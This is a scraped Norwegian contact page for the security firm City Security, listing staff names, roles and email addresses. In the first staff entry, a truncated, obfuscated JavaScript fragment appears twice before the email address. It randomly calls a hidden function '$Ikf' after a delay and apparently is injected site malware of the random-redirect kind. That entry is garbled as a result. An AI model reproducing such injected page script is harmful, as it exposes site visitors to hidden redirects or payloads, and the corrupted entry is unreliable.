Kontaktskjema

    Denne siden er beskyttet av reCAPTCHA og Google's Personvernerklæring og Brukervilkår gjelder.

    KONTAKTINFORMASJON

    Anders Ek

    Anders Ek

    Daglig leder / styremedlem / partner
    andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders@citysecurity.no»>andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders@citysecurity.no
    Henning Kristiansen

    Henning Kristiansen

    Styremedlem / partner
    henning@citysecurity.no
    Kjell Kristiansen

    Kjell Kristiansen

    Styreleder / partner
    kjell@citysecurity.no
    Jonas Slatlem

    Jonas Slatlem

    Avdelingsleder / personalsjef
    jonas@citysecurity.no
    Tom Ulseth

    Tom Ulseth

    Avdelingsleder Sporveien
    tom@citysecurity.no
    Henrik Kristiansen

    Henrik Kristiansen

    Prosjektkoordinator / kontroller
    henrik@citysecurity.no
    Anders Ellefsen

    Anders Ellefsen

    Workflow manager
    ellefsen@citysecurity.no